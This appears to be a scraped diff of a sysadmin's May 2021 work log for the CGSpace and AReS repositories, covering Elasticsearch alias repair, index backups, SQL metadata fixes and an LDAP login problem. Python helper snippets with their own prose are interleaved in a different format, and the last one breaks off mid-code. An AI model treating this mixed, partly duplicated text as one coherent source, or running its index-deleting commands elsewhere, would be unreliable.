                                                                                                                                                                                                                                                                                                                                                          +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                          +    },
                                                                                                                                                                                                                                                                                                                                                          +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                          +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                          +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                          +        }
                                                                                                                                                                                                                                                                                                                                                          +    },
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          • I think they look OK (openrxv-items is an alias of openrxv-items-final), but I took a backup just in case:
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                          $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                          -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                            +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            • Then I started an indexing in the AReS Explorer admin dashboard
                                                                                                                                                                                                                                                                                                                                                            • The indexing finished, but it looks like the aliases are messed up again:
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                            $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                            -

                                                                                                                                                                                                                                                                                                                                                            2021-05-05

                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                            +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                            +yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                            +

                                                                                                                                                                                                                                                                                                                                                            2021-05-05

                                                                                                                                                                                                                                                                                                                                                            • Peter noticed that we no longer display cg.link.reference on the item view
                                                                                                                                                                                                                                                                                                                                                                @@ -229,9 +229,9 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                            $ time ~/dspace64/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                            -~/dspace64/bin/dspace index-discovery -b  4053.24s user 53.17s system 38% cpu 2:58:53.83 total
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              $ time ~/dspace64/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                              +~/dspace64/bin/dspace index-discovery -b  4053.24s user 53.17s system 38% cpu 2:58:53.83 total
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              • Nope! Still slow, and still no mapped item…
                                                                                                                                                                                                                                                                                                                                                                • I even tried unmapping it from all collections, and adding it to a single new owning collection…
                                                                                                                                                                                                                                                                                                                                                                • @@ -244,53 +244,53 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
                                                                                                                                                                                                                                                                                                                                                                • The indexes on AReS Explorer are messed up after last week’s harvesting:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                -    },
                                                                                                                                                                                                                                                                                                                                                                -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                -        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                -        }
                                                                                                                                                                                                                                                                                                                                                                -    }
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
                                                                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                                                  +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                  +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                  +    },
                                                                                                                                                                                                                                                                                                                                                                  +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                  +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                  +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                  +        }
                                                                                                                                                                                                                                                                                                                                                                  +    }
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  • openrxv-items should be an alias of openrxv-items-final
                                                                                                                                                                                                                                                                                                                                                                  • I made a backup of the temp index and then started indexing on the AReS Explorer admin dashboard:
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
                                                                                                                                                                                                                                                                                                                                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                                                  2021-05-10

                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
                                                                                                                                                                                                                                                                                                                                                                  +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                                                                                                  +
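The note above says `openrxv-items` should be an alias of `openrxv-items-final`, but the `_alias` output shows it attached to `openrxv-items-temp`. As a rough sketch only, this check could be scripted against the JSON that `curl -s 'http://localhost:9200/_alias/'` prints. The helper name `alias_owners` and the inline sample are illustrative assumptions, not part of AReS or OpenRXV. The sample contains only the two indices quoted in the log.

```python
import json


def alias_owners(alias_json, alias):
    """Return the sorted names of the indices that carry the given alias.

    alias_json is the raw JSON text returned by Elasticsearch's _alias
    endpoint: a mapping of index name -> {"aliases": {alias name: {...}}}.
    """
    data = json.loads(alias_json)
    return sorted(
        index
        for index, info in data.items()
        if alias in info.get("aliases", {})
    )


# Hypothetical sample shaped like the _alias output quoted in the log
# (the real response lists other indices too, elided there as "...").
sample = """
{
    "openrxv-items-final": {"aliases": {}},
    "openrxv-items-temp": {"aliases": {"openrxv-items": {}}}
}
"""

owners = alias_owners(sample, "openrxv-items")
# The expected healthy state, per the log, is that only the final index owns the alias.
alias_ok = owners == ["openrxv-items-final"]
print(owners, alias_ok)
```

With the sample above, the alias is reported on `openrxv-items-temp` only, so the check fails, which matches the broken state described in the log.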

                                                                                                                                                                                                                                                                                                                                                                  2021-05-10

                                                                                                                                                                                                                                                                                                                                                                  • Amazing, the harvesting on AReS finished but it messed up all the indexes and now there are no items in any index!
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-temp        8thRX0WVRUeAzmd2hkG6TA 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
                                                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-final       BtvV9kwVQ3yBYCZvJS1QyQ 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                    $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-temp        8thRX0WVRUeAzmd2hkG6TA 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
                                                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-final       BtvV9kwVQ3yBYCZvJS1QyQ 1 1      0     0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                    • I fixed the indexes manually by re-creating them and cloning from the backup:
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -X PUT "localhost:9200/openrxv-items-temp-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                    -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp-backup'
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -X PUT "localhost:9200/openrxv-items-temp-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                      +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp-backup'
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      • Also I ran all updated on the server and updated all Docker images, then rebooted the server (linode20):
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                      $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        • I backed up the AReS Elasticsearch data using elasticdump, then started a new harvest:
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                        -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                          +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          • Discuss CGSpace statistics with the CIP team
                                                                                                                                                                                                                                                                                                                                                                            • They were wondering why their numbers for 2020 were so low
                                                                                                                                                                                                                                                                                                                                                                            • @@ -329,10 +329,10 @@ $ elasticdump --input=http://localhost:9200/o
                                                                                                                                                                                                                                                                                                                                                                            • I checked the CLARISA list against ROR’s April, 2020 release (“Version 9”, on figshare, though it is version 8 in the dump):
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            $ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                            -$ csvgrep -c matched -m 'true' /tmp/clarisa-ror-matches.csv | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                                                                                                            -1770
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                              +$ csvgrep -c matched -m 'true' /tmp/clarisa-ror-matches.csv | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                                                                                                              +1770
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              • With 1770 out of 6230 matched, that’s 28.5%…
                                                                                                                                                                                                                                                                                                                                                                              • I sent an email to Hector Tobon to point out the issues in CLARISA again and ask him to chat
                                                                                                                                                                                                                                                                                                                                                                              • Meeting with GARDIAN developers about CG Core and how GARDIAN works
                                                                                                                                                                                                                                                                                                                                                                              • @@ -341,11 +341,11 @@ $ csvgrep -c matched -m 'true' /tmp/c
                                                                                                                                                                                                                                                                                                                                                                                • Fix a few thousand IWMI URLs that are using HTTP instead of HTTPS on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://www.iwmi.cgiar.org','https://www.iwmi.cgiar.org', 'g') WHERE text_value LIKE 'http://www.iwmi.cgiar.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1132
                                                                                                                                                                                                                                                                                                                                                                                -localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://publications.iwmi.org','https://publications.iwmi.org', 'g') WHERE text_value LIKE 'http://publications.iwmi.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1803
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://www.iwmi.cgiar.org','https://www.iwmi.cgiar.org', 'g') WHERE text_value LIKE 'http://www.iwmi.cgiar.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1132
                                                                                                                                                                                                                                                                                                                                                                                  +localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://publications.iwmi.org','https://publications.iwmi.org', 'g') WHERE text_value LIKE 'http://publications.iwmi.org%' AND metadata_field_id=219;
                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1803
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  • In the case of the latter, the HTTP links don’t even work! The web server returns HTTP 404 unless the request is HTTPS
                                                                                                                                                                                                                                                                                                                                                                                  • IWMI also says that their subjects are a subset of AGROVOC so they no longer want to use cg.subject.iwmi for their subjects
                                                                                                                                                                                                                                                                                                                                                                                      @@ -367,67 +367,67 @@ UPDATE 1803
                                                                                                                                                                                                                                                                                                                                                                                      • I have to fix the Elasticsearch indexes on AReS after last week’s harvesting because, as always, the openrxv-items index should be an alias of openrxv-items-final instead of openrxv-items-temp:
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                                        +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                                        +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                                        +    },
                                                                                                                                                                                                                                                                                                                                                                                        +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                                        +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                                        +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                                        +        }
                                                                                                                                                                                                                                                                                                                                                                                        +    },
                                                                                                                                                                                                                                                                                                                                                                                        +...
                                                                                                                                                                                                                                                                                                                                                                                        +
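The alias listing above can also be checked programmatically. The following is a minimal sketch, assuming the `_alias` response has the shape shown above (each index name mapped to an `aliases` object). `indexes_for_alias` is a hypothetical helper name, and the sample is abbreviated from the output above rather than fetched from a live server.

```python
import json


def indexes_for_alias(alias_response: dict, alias: str) -> list[str]:
    """Return the sorted names of indexes that carry the given alias."""
    return sorted(
        index
        for index, info in alias_response.items()
        if alias in info.get("aliases", {})
    )


# Abbreviated sample mirroring the _alias output above (not a live response)
sample = json.loads("""
{
    "openrxv-items-final": {"aliases": {}},
    "openrxv-items-temp": {"aliases": {"openrxv-items": {}}}
}
""")

print(indexes_for_alias(sample, "openrxv-items"))
```

With the sample above, the helper reports that the `openrxv-items` alias is attached to `openrxv-items-temp` rather than `openrxv-items-final`.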
• I took a backup of the openrxv-items index with elasticdump so I can re-create the indexes manually before starting a new harvest tomorrow:
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                        +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                        +

                                                                                                                                                                                                                                                                                                                                                                                        2021-05-16

                                                                                                                                                                                                                                                                                                                                                                                        • I deleted and re-created the Elasticsearch indexes on AReS:
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                          +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          • Then I re-imported the backup that I created with elasticdump yesterday:
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            $ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                            +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000 
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            • Then I started a new harvest on AReS
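The delete, re-create, and alias steps above can be sketched as an ordered request plan. This is only an illustration, assuming the same host and index names as the curl commands above. `reset_plan` and `ES_URL` are hypothetical names, and the function only builds the requests without sending anything to Elasticsearch.

```python
import json

ES_URL = "http://localhost:9200"  # assumption: same host as the curl commands above


def reset_plan(final: str, temp: str, alias: str, base: str = ES_URL):
    """Build the (method, url, body) requests in order, without sending them."""
    steps = []
    # Delete both indexes first, then re-create them empty
    for index in (final, temp):
        steps.append(("DELETE", f"{base}/{index}", None))
    for index in (final, temp):
        steps.append(("PUT", f"{base}/{index}", None))
    # Point the alias at the final index only
    body = {"actions": [{"add": {"index": final, "alias": alias}}]}
    steps.append(("POST", f"{base}/_aliases", json.dumps(body)))
    return steps


plan = reset_plan("openrxv-items-final", "openrxv-items-temp", "openrxv-items")
for method, url, body in plan:
    print(method, url, body or "")
```

Keeping the plan as data makes it easy to review the order of operations before running anything destructive against the indexes.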

                                                                                                                                                                                                                                                                                                                                                                                            2021-05-17

                                                                                                                                                                                                                                                                                                                                                                                            • The AReS harvest finished and the Elasticsearch indexes seem OK so I shouldn’t have to fix them next time…
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-final      TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
                                                                                                                                                                                                                                                                                                                                                                                              +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                                                              +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                                                              +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                                                              +    },
                                                                                                                                                                                                                                                                                                                                                                                              +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                                                              +        "aliases": {
                                                                                                                                                                                                                                                                                                                                                                                              +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                                                              +        }
                                                                                                                                                                                                                                                                                                                                                                                              +    },
                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • Abenet said she and some others can’t log into CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                • I tried to check the CGSpace LDAP account and it does seem to be not working:
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap@cgiarad.org" -W "(sAMAccountName=aorth)"
                                                                                                                                                                                                                                                                                                                                                                                              -Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                              -ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                                                                              -        additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap@cgiarad.org" -W "(sAMAccountName=aorth)"
                                                                                                                                                                                                                                                                                                                                                                                                +Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                                +ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                                                                                +        additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                • I sent a message to Biruk so he can check the LDAP account
                                                                                                                                                                                                                                                                                                                                                                                                • IWMI confirmed that they do indeed want to move all their subjects to AGROVOC, so I made the changes in the XMLUI and config (#467)
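The `ldap_bind` failure above carries a `data 532` field in its additional info. Active Directory conventionally puts a hexadecimal sub-code there, and 532 is the one usually documented as an expired password. The log itself does not state the cause, so treat the following as a minimal sketch for reading such messages rather than a diagnosis; the `AD_BIND_SUBCODES` table and the `explain_bind_error` helper are hypothetical names introduced here for illustration.

```python
import re

# Commonly documented Active Directory sub-codes found in the "data" field
# of AcceptSecurityContext errors (hexadecimal, as printed by the server).
AD_BIND_SUBCODES = {
    "525": "user not found",
    "52e": "invalid credentials",
    "530": "not permitted to log on at this time",
    "531": "not permitted to log on from this workstation",
    "532": "password expired",
    "533": "account disabled",
    "701": "account expired",
    "773": "user must reset password",
    "775": "account locked out",
}


def explain_bind_error(message: str) -> str:
    """Return a human-readable meaning for the AD sub-code in an error string."""
    match = re.search(r"AcceptSecurityContext error, data ([0-9a-fA-F]+)", message)
    if match is None:
        return "no Active Directory sub-code found"
    code = match.group(1).lower()
    return AD_BIND_SUBCODES.get(code, f"unknown sub-code {code}")


# The additional info line copied from the ldapsearch output above.
error = (
    "80090308: LdapErr: DSID-0C090453, comment: "
    "AcceptSecurityContext error, data 532, v3839"
)
print(explain_bind_error(error))  # password expired
```

If the sub-code does point at an expired password, that would be consistent with several users failing to log in at once, since the bind account is shared.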
                                                                                                                                                                                                                                                                                                                                                                                                    @@ -446,14 +446,14 @@ ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                $ xmllint --xpath '//value-pairs[@value-pairs-name="ccafsprojectpii"]/pair/stored-value/node()' dspace/config/input-forms.xml
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  $ xmllint --xpath '//value-pairs[@value-pairs-name="ccafsprojectpii"]/pair/stored-value/node()' dspace/config/input-forms.xml
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  • I formatted the input file with tidy, especially because one of the new project tags has an ampersand character… grrr:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ tidy -xml -utf8 -m -iq -w 0 dspace/config/input-forms.xml      
                                                                                                                                                                                                                                                                                                                                                                                                  -line 3658 column 26 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                  -line 3659 column 23 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    $ tidy -xml -utf8 -m -iq -w 0 dspace/config/input-forms.xml      
                                                                                                                                                                                                                                                                                                                                                                                                    +line 3658 column 26 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                    +line 3659 column 23 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    • After testing whether this escaped value worked during submission, I created and merged a pull request to 6_x-prod (#468)
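The tidy warnings above come from a bare `&` inside an XML value, which has to be written as `&amp;` to be well-formed. As a rough sketch of the escaping step, the snippet below uses Python's standard library; the value `EXAMPLE&WA_EU-IFAD` is a hypothetical stand-in (only the `&WA_EU-IFAD` part appears in the warnings), and the `stored-value` element name is taken from the xmllint query earlier.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Hypothetical project tag containing a bare ampersand.
raw_value = "EXAMPLE&WA_EU-IFAD"

# An unescaped ampersand makes the fragment ill-formed, so parsing fails.
try:
    ET.fromstring(f"<stored-value>{raw_value}</stored-value>")
    unescaped_parses = True
except ET.ParseError:
    unescaped_parses = False

# escape() rewrites &, < and > as XML entities.
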